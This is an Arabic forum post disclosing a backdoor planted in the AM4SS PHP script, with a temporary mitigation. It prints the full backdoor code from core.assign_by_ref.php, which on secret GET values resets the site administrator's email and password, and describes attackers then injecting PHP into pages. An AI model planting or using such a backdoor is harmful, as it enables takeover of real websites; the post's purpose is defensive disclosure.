[ترقيع ثغرة 0day ] : سكربت AM4SS
http://www.dzbatna.com/images/icons/icon26.gif [طھط±ظ‚ظٹط¹ ط«ط؛ط±ط© 0day ] : ط³ظƒط±ط¨طھ AM4SS
بسم الله الرحمن الرحيم ....
ثغره برايفت في سكربت Am4ss نوع الثغره PHP Code Injection
الملف المصاب
libs/internals/core.assign_by_ref.php
محتوى الملف :
رمز PHP:
if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب')
{
define('Am4ss', true);
require('../../requires/config.php');
@mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
@mysql_select_db($Config['DataBase']['Name']);
$sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = '[email protected]', password = '".md5('kawkawa')."' where userid = '1'");
if($sql)
{
echo 'تم التحديث update للموقع: ' . $_SERVER['HTTP_HOST'];
} else
{
die(mysql_error());
}
} else
{
echo 'البيانات خاطئة';
}
?>
السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده
الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم
ومن ثم يقوم المخُترق بحقن كود code بي اتش بي في صفحه من صفحات الموقع
-----------------------------------------
ترقيع الثغره ( مؤقتا ) .. تغيير مسار لوحة التحكم ووضع جدار ناري عليها وعلى هذه المجلدات :
am4ss_cache
templates
لان هذه المجلدات تحمل تصريح 777
وبالتوفيق للجميع
أللهم بلغت اللهم فاشهد ...
تحياتي
Cyber_RoOT
http://www.dzbatna.com/images/smilies/blushing.gif
التعديل الأخير كان بواسطة عذابي غير; 21 - 07 - 2014 الساعة 02:25
https://fbcdn-sphotos-d-a.akamaihd.n...93518507_n.png
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى©